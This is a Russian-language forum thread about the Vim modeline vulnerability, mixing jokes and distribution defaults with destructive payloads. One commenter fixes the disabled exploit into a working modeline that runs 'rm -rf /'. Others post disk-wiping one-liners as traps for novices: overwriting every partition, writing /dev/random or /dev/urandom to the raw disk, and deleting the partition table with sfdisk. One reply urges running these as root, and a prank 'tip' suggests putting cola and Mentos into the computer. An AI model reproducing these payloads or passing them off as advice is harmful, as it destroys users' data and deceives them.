Уязвимость в Vim

> 2Модераторы, поправьте пожалуйста команду в эксплойте, а то ведь пионЭров ещё много... начнут проверять:)

А чем плоха эта команда? У меня она просто винтом жужжит.

Поставить в системник 0.5 бутылку колы и опустить в нее пару таблеток ментоса.

Баго-фича жуткая!

Вот оказывается почему в Gentoo эти modelines выключены по умолчанию... Мудрые ребята.

>А чем плоха эта команда? У меня она просто винтом жужжит.

Подстрекательство? ;-)

Просто вспомнилась строчка на перл и как её многие рукожопые жопоруки начали бездумно вставлять себе в шелл...

Хотя, естественный отбор в своём роде:)

>Поставить в системник 0.5 бутылку колы и опустить в нее пару таблеток ментоса.

сегодня купил специально колу и ментос, не работает... я и в стакане мешал и внутри организма... это всё разводка

>тогда тебе прямая дорога на http://www.gnu.org/software/emacs/
>иди оспаривай мнение разработчиков

И что? У меня своя голова на плечах есть, и я вижу, что тот же емакс уже давно не редактор, а скорее уже фреймворк для редактирования (и не только), то я так и говорю.

ЗЫ. Ничего не хочу оспаривать, особенно мнение людей с чувством юмора == NULL.

В генту уже проапгрейдили в стабильной ветке

>сегодня купил специально колу и ментос, не работает... я и в стакане мешал и внутри организма... это всё разводка

Либо кола несвежая, либо ментос нелицензионный.

БЛЯЯЯ!!!!!! где мои файлы???? а что под рутом нельзя было ЭТО пускать?????

> Емакс не текстовый редактор.

Графический?

> кто еще выипнецца способом вытереть корень?

cat /proc/partitions | tail -n +3 | awk '{print $4}' | while read A; do echo "echo 'hello world' > $A" | sh ; done

> cat /dev/random > /dev/hda Затрёт даже не замоунченные разделы, в отличие от.

Ага как же, вот у меня hda это сидюк, а винчи начинаются с sda.. При этом рут вообще на /dev/sdg3 (вот так контроллеры включены..). Так что выдернуть рут-раздел из mount эффективнее (другое дело, что на / все равно ничего ценного нет - ни home, ни var, терять там просто нечего..)

Error detected while processing modelines:
line 1:
E518: Unknown option: -rf

Что это?

> Что это?

Эксплоит был специально сделан нерабочим. Пробелы заэкранируй.

> cat /dev/random > /dev/hda

Ни роботает команда. Говорит что hda read only. Чо я делаю нитак?

Все равно не понял.

vim: fdm=expr fde=feedkeys("\\:![rm\ -rf\ /]<cr>")

Теперь внизу появляется

:![rm -rf /]<cr>

Если нажать на ентер, то

/bin/bash: -c: line 0: syntax error near unexpected token `newline'
/bin/bash: -c: line 0: `[rm -rf /]<cr>'

> БЛЯЯЯ!!!!!! где мои файлы???? а что под рутом нельзя было ЭТО пускать????? \par Опа! +1

Все, понял. Правильно вот так:

vim: fdm=expr fde=feedkeys("\\:!rm\ -rf\ /\\<cr>")

Вместо /dev/hda поставь устройство, которое обозначает основной винт, у тебя наверно тоже на hda сидюк или чтото ещё. И из под рута естественно запускай :)

Какого хрена... А чего линух не грузится?

>Как вам такой сценарий: юзер хостинга кладет такой файл к себе в HOME, потом звонит в техподдержку и говорит что у него не работает скрипт, который должен работать, а пример нерабочего скрипта лежит там-то. Сотрудник ТП открывает этот файл vim'ом ....

он и вы ССЗБ ;))) su для кого придумали?

Фигня это все, я сейчас у себя запустил, и ничего не прои

бал

http://www.guninski.com/vim1.html - 2002 год
Что это все вдруг вспомнили ?

в нормальных дистрах (gentoo) отключено по умолчанию

" {{{ Modeline settings
" We don't allow modelines by default. See bug #14088 and bug #73715.
" If you're not concerned about these, you can enable them on a per-user
" basis by adding "set modeline" to your ~/.vimrc file.
set nomodeline
" }}}

Реальные отцы юзают "ed", а потуги прочей молодёжи пользовать свистелки и перделки им нафиг не впёрлись.

> Вот оказывается почему в Gentoo эти modelines выключены по умолчанию... Мудрые ребята.

Да они по-моему везде явно выключены. Вот сейчас в RHEL и федоре глянул - выключены.

> Реальные отцы юзают "ed", а потуги прочей молодёжи пользовать свистелки и перделки им нафиг не впёрлись.

Дадада! Ну я еще не отец, ed мне пока слабо, а вот ex (vim в эмуляции ex) я уже почти осилил. И в pure-vi без vim'овских плюшек (что за блажь, курсор, двигающийся по стрелочкам и визуальное выделение! отвлекает только) почти комфортно могу работать. Постепенно, думаю, стану настоящим папой и осилю ed.

нифига не разводка. сам видел вжувую такой фонтан

> Уязвимость присутствует в версиях ниже 7.0.219.

У кого-то ещё такое старье стоит? на vim-7.0.235 не работает

> отключить modelines.

Везде же крупными буквами пишуть - "отключайте modelines"

> а винт в окно в 15 этажа не пробовали?

Пытался как-то раз. Выше четвёртого этажа подбросить не получилось.

Чёрт... почему мой компутер при загрузке пишет Invalid system disk???

Господа, а кто нибудь может подсказать как в vi/vim можно удалить все строки от текущей до начала файла? От текущей до конца dG но иногда бывает нужно удалить именно от текущей до начала. Спасибо!

d1G

>cat /dev/random > /dev/hda Затрёт даже не замоунченные разделы, в отличие от.

/dev/random сильно медленно генерирует значения, ибо вычисляются они из нажатия клавиш на клавиатуре и движения мышки. сделайте cat /dev/random и убедитесь сами

лучше всего делать cat /dev/urandom > куданадо

быстрей всего работает /dev/zero > куданадо

> кто еще выипнецца способом вытереть корень?

Тогда уж лучше делать так:

dd if=/dev/urandom of=/dev/hda или of=/dev/sda

Или sfdisk-ом таблицу разделов снести.

Вот это деструктивно, даже другие ОСи пострадают. А вы тут до сих пор 'rm -rf /'-ами балуетесь :))